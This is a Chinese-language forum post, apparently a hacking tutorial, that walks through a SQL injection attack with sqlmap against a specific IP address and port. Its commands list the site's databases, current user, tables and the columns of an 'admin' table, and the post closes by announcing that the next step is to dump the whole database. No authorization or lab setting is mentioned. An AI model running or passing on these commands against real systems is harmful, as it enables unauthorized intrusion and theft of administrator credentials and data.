设为首页
收藏本站
切换到宽版
登录
立即注册
找回密码
搜索
搜索
本版
帖子
用户
快捷导航
论坛
BBS
VIP用户组
官网群
无名商城论坛
»
论坛
›
资源分享区
›
学习资源专区
›
【梅开二度】sql注入
返回列表
发帖
查看:
216
|
回复:
0
[其他技术]
【梅开二度】sql注入
[复制链接]
无名
无名
当前离线
积分
32464
1万
主题
1万
帖子
3万
积分
管理员
积分
32464
发消息
发表于 2022-5-8 17:20:21
|
显示全部楼层
|
阅读模式
首先在termux里输入 sqlmap -u "http://59.63.200.79:8003/?id=1" --dbs 如图一 注dbs前是两个 -
注入的结果表示:
(1)注入参数id为GET注入,注入类型有四种,分别是:boolean-based blind/error-based/time-based blind/union quer
(2)数据库类型:MySQL
(3)画红圈的是网址所有的数据库名单
这时,我们发现这个网址存在注入,并且拿到了所有数据库名单。我们决定查看当前使用的数据库
sqlmap -u "http://59.63.200.79:8003/?id=1" --current-db
画出的就是当前使用使用的数据库:maoshe,一会儿我们对它下手
然后我们探测当前的数据库使用账户
sqlmap -u "http://59.63.200.79:8003/?id=1" --current-user 如图三
可见当前的数据库使用账户为:maoshe@%
下面我们来探测maoshe这个数据库里的所有表
sqlmap -u "http://59.63.200.79:8003/?id=1" -D maoshe --tables 如图四
下面我们探测的是admin这个表的列
sqlmap -u "http://59.63.200.79:8003/?id=1" -D maoshe --tables -T admin --columns 如图五
表中字段明显拿到了,下一步果断脱库!
数据库
,
注入
,
如图
,
我们
,
使用
相关帖子
•
【FUT】AIDE第一课
•
【FUT】AIDE第二课
•
【Max】团队~利用AIDE做个小应用=总结+AIDE教程结束
•
【FUT】二开代刷教程
•
【教程】【LUR】米酷影视源码
•
【LUR】帅气炫迈在线教你如何搭建蔡徐坤打篮球网站
•
【解忧】深入理解Java反射
•
【LUR】最新PTCMS小说精美多风格四套全新版源码+模板
•
【FUT】腾讯视频【去广告】教程?
回复
使用道具
举报
返回列表
发帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
快速回复
返回顶部
返回列表